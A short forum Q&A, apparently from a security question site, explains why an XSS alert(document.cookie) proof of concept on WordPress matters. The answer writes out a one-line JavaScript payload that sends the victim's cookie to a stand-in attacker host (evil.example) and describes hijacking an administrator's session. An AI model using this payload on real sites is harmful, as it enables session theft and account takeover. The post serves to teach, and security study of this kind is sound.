security - Wordpress XSS vulnerabilty (grabbing PHPSESSID) -
i started study vulnerability of websites , i've got doubt wordpress's xss vulnerability. exploit, attacker can grab phpsessid simple javascript's command:
(alert(document.cookie))
how can attacker use this? serious security problem or not?
an alert(…)
proof of concept demonstrates successful exploitation of xss vulnerability. not used in actual attack doesn’t give attacker benefit.
in real attack, attacker try value of document.cookie
somehow. simple example use javascript forge simple http request contains value of document.cookie
this:
new image().src="http://evil.example/?"+document.cookie
this creates image attacker’s url image source has cookie appended it.
with victim’s cookie, attacker may able hijack victim’s session , use wordpress same privileges victim. in case victim administrator, attacker have access administrative functions.
Comments
Post a Comment